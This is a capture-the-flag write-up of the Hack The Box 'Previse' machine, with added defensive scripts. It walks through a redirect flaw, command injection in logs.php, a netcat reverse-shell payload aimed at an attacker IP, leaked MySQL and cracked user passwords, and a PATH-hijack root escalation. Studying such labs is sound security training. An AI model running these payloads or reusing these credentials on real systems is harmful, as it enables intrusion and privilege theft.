
Previse HTB

[Pasted image 20210808095245.png]

An easy box: an unvalidated redirection vulnerability exposes the registration page, which gives access to the site and to the backup file sitebackup.zip; a POST parameter that reaches an exec call in the backup's source yields remote code execution on the machine. The MySQL credentials in the configuration file allow enumerating the accounts in the database, and cracking a password hash gives the user shell. For root, a sudo-runnable script calls `date` by bare name, so the PATH variable can be hijacked.
  • Nmap
  • Recon
  • Unvalidated Redirect Vulnerability
  • User escalation
  • Root Privilege Escalation

As usual let’s start with a Nmap Scan.

Nmap

First thing first, we run a quick initial nmap scan to see which ports are open and which services are running on those ports.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

We get back the following result showing that two ports are open:

  • Port 22: running OpenSSH 7.6p1
  • Port 80: running Apache httpd 2.4.29

Recon

Port 80

We get a login page that does not link to any other pages, so we run ffuf to enumerate directories and pages. I could not find any directories, so I moved on to fuzzing for files with the .php extension.

root@kali:~/ctf/htb/Previse# ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.129.185.121/FUZZ.php 
 
        /'___\  /'___\           /'___\                                                                                                                               
       /\ \__/ /\ \__/  __  __  /\ \__/        
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\       
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/       
         \ \_\   \ \_\  \ \____/  \ \_\        
          \/_/    \/_/   \/___/    \/_/        

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.185.121/FUZZ.php
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

#                       [Status: 302, Size: 2801, Words: 737, Lines: 72, Duration: 155ms]
index                   [Status: 302, Size: 2801, Words: 737, Lines: 72, Duration: 155ms]
login                   [Status: 200, Size: 2224, Words: 486, Lines: 54, Duration: 155ms]
files                   [Status: 302, Size: 4914, Words: 1531, Lines: 113, Duration: 159ms]
header                  [Status: 200, Size: 980, Words: 183, Lines: 21, Duration: 154ms]
nav                     [Status: 200, Size: 1248, Words: 462, Lines: 32, Duration: 156ms]
#                       [Status: 302, Size: 2801, Words: 737, Lines: 72, Duration: 2419ms]
download                [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 3433ms]
footer                  [Status: 200, Size: 217, Words: 10, Lines: 6, Duration: 160ms]
                        [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 4430ms]
status                  [Status: 302, Size: 2966, Words: 749, Lines: 75, Duration: 160ms]
logout                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 155ms]
accounts                [Status: 302, Size: 3994, Words: 1096, Lines: 94, Duration: 155ms]
config                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 154ms]
logs                    [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 155ms]

Notice that most of the pages return a 302 response code but with different, non-zero sizes: the server renders the full page and only then redirects, so the page content is sent along with the redirect. This is the unvalidated redirect vulnerability the box is built around.
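As an added check, not part of the original post, here is a small Python triage script that parses ffuf result lines (the sample input is copied from the run above) and flags every 3xx response whose body size is non-zero. A clean redirect such as download, logout or logs ships an empty body, while index, files and accounts carry the full page, which is the tell for a redirect issued after the content has already been generated.

```python
import re

# Constructed sample: result lines from the ffuf run above, banner omitted.
FFUF_OUTPUT = """\
index                   [Status: 302, Size: 2801, Words: 737, Lines: 72, Duration: 155ms]
login                   [Status: 200, Size: 2224, Words: 486, Lines: 54, Duration: 155ms]
files                   [Status: 302, Size: 4914, Words: 1531, Lines: 113, Duration: 159ms]
download                [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 3433ms]
accounts                [Status: 302, Size: 3994, Words: 1096, Lines: 94, Duration: 155ms]
logout                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 155ms]
logs                    [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 155ms]
"""

# One ffuf result line: "<path>  [Status: <code>, Size: <bytes>, ...]"
LINE_RE = re.compile(r"^(?P<path>\S*)\s+\[Status: (?P<status>\d+), Size: (?P<size>\d+),")


def parse_ffuf(text):
    """Yield (path, status, size) for each result line; banner and blank lines are ignored."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group("path"), int(m.group("status")), int(m.group("size"))


def redirect_leak_candidates(text, min_size=0):
    """Paths that answer with a 3xx but still ship a body larger than min_size bytes.

    A redirect that sends content is the symptom of a script that keeps
    executing after emitting the Location header.
    """
    return sorted(
        path
        for path, status, size in parse_ffuf(text)
        if 300 <= status < 400 and size > min_size
    )


if __name__ == "__main__":
    for path in redirect_leak_candidates(FFUF_OUTPUT):
        print(f"{path}.php: redirect with a non-empty body, inspect it without following redirects")
```

Confirm a candidate by fetching it with a client that does not follow redirects (Burp or curl) and comparing the body with what the browser shows. On the application side, the fix is to stop execution right after sending the Location header, so no protected content is rendered into the redirect response.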

So let’s intercept the request with Burp and see what the page contains before the redirection happens.

Unvalidated Redirect Vulnerability

Get request to accounts.php

[Pasted image 20210808075923.png]

Response from Server

[Pasted image 20210808080009.png]

[Pasted image 20210808080032.png]

The complete accounts.php page is sent to us before the redirection happens. It contains a form that was not visible in the browser, because the browser follows the redirect to login.php.

Let’s save the page locally and send a post request from accounts form.

[Pasted image 20210808080208.png]

I registered myself as a user and was able to log in to the website.

[Pasted image 20210808080307.png]

After scrolling through the pages, we find a files.php page which contains a backup of the website.

[Pasted image 20210808080418.png]

URL : 10.129.185.121/download.php?file=32

I downloaded the backup file and went through the source code for a while.

[Pasted image 20210808080612.png]

[Pasted image 20210808081101.png]

We have control over a POST parameter that is passed into the exec function in the logs.php page.
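To make the defect class concrete, here is an added Python rendering of the same pattern and its hardened counterpart; this is example code, not the box's PHP. The parameter name `delim`, the three accepted choices and the script path are assumptions for the demonstration. The vulnerable form concatenates the request value into a shell command line; the hardened form maps the value through an allowlist and runs the program with an argument vector, so shell metacharacters never reach a shell.

```python
import shlex
import subprocess

# Assumptions (not taken from the box's source): the export endpoint receives a
# delimiter *choice* in a POST field, and the script path below is a placeholder.
EXPORT_SCRIPT = "/opt/app/export_logs.py"
ALLOWED_DELIMS = {"comma": ",", "space": " ", "tab": "\t"}


def vulnerable_command(delim):
    """The defect class seen in logs.php: the request value is pasted straight into
    a shell command line, so metacharacters in it become part of the command.
    Returned as a string for inspection only; never executed here."""
    return f"/usr/bin/python3 {EXPORT_SCRIPT} {delim}"


def looks_like_injection(value):
    """Detection hint for request logs or WAF rules: True if the value would
    need quoting to be a single sh word (spaces, ';', '|', '$', backticks...)."""
    return shlex.quote(value) != value


def build_argv(delim):
    """Hardened form: the request value only selects an allowlisted delimiter,
    and the program is invoked with an argv list instead of a shell string."""
    if delim not in ALLOWED_DELIMS:
        raise ValueError(f"rejected delimiter choice: {delim!r}")
    return ["/usr/bin/python3", EXPORT_SCRIPT, ALLOWED_DELIMS[delim]]


def accepts(delim):
    """True if the hardened endpoint would run the export for this value."""
    try:
        build_argv(delim)
        return True
    except ValueError:
        return False


def run_export(delim):
    """Execute without a shell; off-list values raise before anything runs."""
    return subprocess.run(build_argv(delim), capture_output=True, text=True, check=False)


if __name__ == "__main__":
    for value in ("comma", "comma;id"):
        print(f"{value!r}: suspicious={looks_like_injection(value)} accepted={accepts(value)}")
```

The allowlist is the real control here: even with an argv list, passing the raw value through would still let an attacker choose an arbitrary argument for the script, so the request value should select an option rather than supply one.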

[Pasted image 20210808081320.png]

The very first thing I would like to see is whether we can make the server send a ping packet.

[Pasted image 20210808081626.png]

[Pasted image 20210808081609.png]

So we have successful remote code execution (RCE). Let’s exploit this and get a reverse shell.

[Pasted image 20210808081816.png]

Payload = rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.78 443 >/tmp/f

[Pasted image 20210808082617.png]

We have a shell, but it is non-interactive, so let’s upgrade it to a fully interactive one.

python -c 'import pty;pty.spawn("/bin/bash")'

Then background the shell with Ctrl-Z and, in the local terminal, put the tty into raw mode before bringing it back to the foreground:

stty raw -echo; fg
www-data@previse:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
m4lwhere:x:1000:1000:m4lwhere:/home/m4lwhere:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

We have one regular user: m4lwhere.

User Escalation

cat config.php
<?php

function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}

?>

We have the MySQL database credentials in config.php, so I logged into the MySQL database with them.

[Pasted image 20210808085546.png]

We have a salted crypt hash; let’s crack it with hashcat.

[Pasted image 20210808091901.png]

Password: ilovecody112235!

[Pasted image 20210808092039.png]

We are in.

[Pasted image 20210808092100.png]

Root Escalation

[Pasted image 20210808092238.png]

[Pasted image 20210808092754.png]

There are two possibilities I see for exploiting this. One is to change the PATH variable so that the `date` command resolves to our own file; the other is to create a symlink at the file paths mentioned in the script.

Let’s go with the `date` command, which is the easier way to do it.

[Pasted image 20210808094530.png]

I wrote `whoami` inside a file named date and added its directory to the front of our PATH variable.

[Pasted image 20210808094623.png]

[Pasted image 20210808094658.png]

The generated file name had root appended to it, which is the output of our whoami command, confirming that the script runs as root.

[Pasted image 20210808094958.png]

Let’s put our reverse shell payload and run again.

[Pasted image 20210808094927.png]

We get a shell and we are root on the machine.
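From the defender's side, the root step works only because a script run under sudo invokes `date` by bare name and the caller controls PATH. As an added example, not part of the original post, the Python audit below finds commands a shell script calls without an absolute path, lists PATH entries the current user can write to, and rewrites the script with a pinned PATH and absolute paths. The sample script is a constructed stand-in; the box's real script appears only in the screenshots above, and the heuristic parser is line-based and deliberately simple.

```python
import os
import re
import tempfile

# Constructed stand-in for a sudo-runnable backup script (not the box's script).
SAMPLE_SCRIPT = """\
#!/bin/bash
# rotate the application log (constructed example)
gzip -c /var/log/app.log > /var/backups/app.log.$(date +%F).gz
/usr/bin/logger -t backup "rotation finished"
"""

SUBST_RE = re.compile(r"\$\(\s*([^\s)]+)[^)]*\)")   # $(cmd args) -> cmd
OPERATOR_RE = re.compile(r"\|\||&&|[|;]")           # pipeline / list separators
ASSIGN_RE = re.compile(r"^[A-Za-z_]\w*=")           # VAR=value prefix
KEYWORDS = {"if", "then", "else", "elif", "fi", "for", "do", "done",
            "while", "until", "exit", "return"}


def _candidate(name):
    """True if `name` would be resolved through PATH rather than by absolute path."""
    return bool(name) and not name.startswith(("/", "$", ">", "<", "./")) and name not in KEYWORDS


def bare_commands(script_text):
    """Set of commands the script invokes by bare name (heuristic).

    Looks at the first word of every pipeline/list segment plus the command
    inside each $( ... ) substitution; skips comments, the shebang and
    VAR=value prefixes.
    """
    found = set()
    for raw in script_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for name in SUBST_RE.findall(line):
            if _candidate(name):
                found.add(name)
        for segment in OPERATOR_RE.split(SUBST_RE.sub("", line)):
            for word in segment.split():
                if ASSIGN_RE.match(word):
                    continue  # environment prefix, keep looking for the command
                if _candidate(word):
                    found.add(word)
                break
    return found


def writable_path_dirs(path_value):
    """PATH entries the current user could drop a look-alike binary into."""
    return [d for d in path_value.split(":") if d and os.path.isdir(d) and os.access(d, os.W_OK)]


def harden_script(script_text, resolved):
    """Pin PATH at the top and replace each bare command with its absolute path.

    `resolved` maps bare names to the path to use, e.g. {"date": "/bin/date"};
    names are matched as whole words only.
    """
    text = script_text
    for name, abs_path in resolved.items():
        text = re.sub(rf"(?<![\w/.-]){re.escape(name)}(?![\w.-])", abs_path, text)
    lines = text.splitlines()
    insert_at = 1 if lines and lines[0].startswith("#!") else 0
    lines.insert(insert_at, "PATH=/usr/sbin:/usr/bin:/sbin:/bin")
    return "\n".join(lines) + "\n"


def demo_writable_check():
    """Self-check: a fresh temp dir is reported as writable, a missing one is not."""
    with tempfile.TemporaryDirectory() as tmp:
        missing = os.path.join(tmp, "does-not-exist")
        return writable_path_dirs(f"{tmp}:{missing}") == [tmp]


if __name__ == "__main__":
    print("bare commands:", sorted(bare_commands(SAMPLE_SCRIPT)))
    print("writable PATH entries:", writable_path_dirs(os.environ.get("PATH", "")))
    print(harden_script(SAMPLE_SCRIPT, {"date": "/bin/date", "gzip": "/bin/gzip"}))
```

Run the audit against every script referenced from a sudoers rule: any bare command name combined with a PATH the invoking user controls is the same condition exploited here. Pinning PATH inside the script, or using absolute paths throughout, removes the lookup the attacker relies on.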

This post is licensed under CC BY 4.0 by the author.